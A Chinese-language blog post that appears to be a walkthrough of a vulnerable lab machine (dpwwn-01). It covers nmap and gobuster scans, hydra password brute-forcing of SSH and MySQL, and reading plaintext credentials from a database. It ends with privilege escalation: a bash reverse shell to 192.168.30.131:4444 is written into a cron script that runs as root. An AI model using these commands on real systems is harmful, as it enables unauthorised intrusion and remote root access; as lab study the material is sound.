李乐意的博客

tags:
@ 01/01/0001

端口扫描

nmap漏洞扫描枚举出两个路径。

| http-enum:
|   /info.php: Possible information file
|_  /icons/: Potentially interesting folder w/ directory listing
gobuster dir -u http://192.168.30.150 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt -o dirscan.txt

这里目录扫描也没有有用信息。

尝试对ssh和mysql服务进行弱口令爆破。

hydra -l root -P /usr/share/wordlists/fasttrack.txt ssh://192.168.30.150
hydra -l root -P /usr/share/wordlists/fasttrack.txt mysql://192.168.30.150

image-20251012215700721

mysql弱口令破解成功,没有显示密码,应该是空密码。

mysql -u root -p -h 192.168.30.150 --skip-ssl

image-20251012215814562

数据库登录成功。

数据库信息收集

image-20251012215905095

发现有一个ssh的数据库,里面存在users表。

image-20251012215944249

成功拿到一组凭证。

用户名 密码
mistic testP@$$swordmistic

mistic用户ssh

image-20251012220146854

登录成功。

信息收集

sudo -l

无。

内核版本

[mistic@dpwwn-01 ~]$ uname -a
Linux dpwwn-01 3.10.0-957.el7.centos.plus.i686 #1 SMP Wed Nov 7 19:17:19 UTC 2018 i686 i686 i386 GNU/Linux

低版本,可以使用脏牛提权。先继续收集其他信息。

SUID

find / -perm -u=s -type f 2>/dev/null

还可以尝试PwnKit漏洞。

apabilities 文件提权

getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep

没特殊二进制bin文件。

定时任务

crontab -l
cat /etc/crontab

image-20251012224527346

运行着一个脚本,以root身份执行。

可写文件

find / -writable -type f  2>/dev/null

image-20251012221552516

回到该用户家目录下,脚本logrot.sh。

#!/bin/bash
#
#LOGFILE="/var/tmp"
#SEMAPHORE="/var/tmp.semaphore"


while : ; do
  read line
  while [[ -f $SEMAPHORE ]]; do
    sleep 1s
  done
  printf "%s\n" "$line" >> $LOGFILE
done

加入反弹shell。

cat <<EOF > logrot.sh
#!/bin/bash
#
#LOGFILE="/var/tmp"
#SEMAPHORE="/var/tmp.semaphore"
/bin/bash -i >& /dev/tcp/192.168.30.131/4444 0>&1

while : ; do
  read line
  while [[ -f \$SEMAPHORE ]]; do
    sleep 1s
  done
  printf "%s\n" "\$line" >> \$LOGFILE
done

EOF

kali监听。

nc -lvnp 4444

等待定时任务运行。

image-20251012230331114

提权成功。